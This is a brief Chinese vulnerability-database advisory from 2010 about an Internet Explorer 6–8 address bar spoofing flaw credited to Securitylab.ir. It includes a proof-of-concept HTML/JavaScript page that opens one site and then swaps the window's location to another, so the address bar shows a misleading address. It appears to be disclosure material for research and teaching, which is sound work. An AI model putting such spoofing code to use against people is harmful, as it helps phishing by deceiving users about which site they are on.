IE地址栏欺骗漏洞
- 发表于
- Vulndb
发布时间:2010-07-24
影响版本:IE6/7/8
漏洞描述:
参考
<*
http://Securitylab.ir/Advisories
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
<script> function Spoof() { pd=window.open('http://www.yahoo.com', '','location=1'); pd.location.replace('http://www.microsoft.com/'); } </script> <p align="center"> <b><font face="Calibri">Internet Explorer Address Bar Spoofing Vulnerability (IE8,IE7,IE6)</font></b></p> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <p align="center"> <a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <p align="center"><font face="Calibri" size="2"> ---------------------------------------------------------------------</font></p> <p align="center"><font size="2" face="Calibri">Discovered by: Pouya Daneshmand Securitylab.ir</font></p> <p align="center"><font face="Calibri" size="2"> ---------------------------------------------------------------------</font></p> |
安全建议:
等待补丁
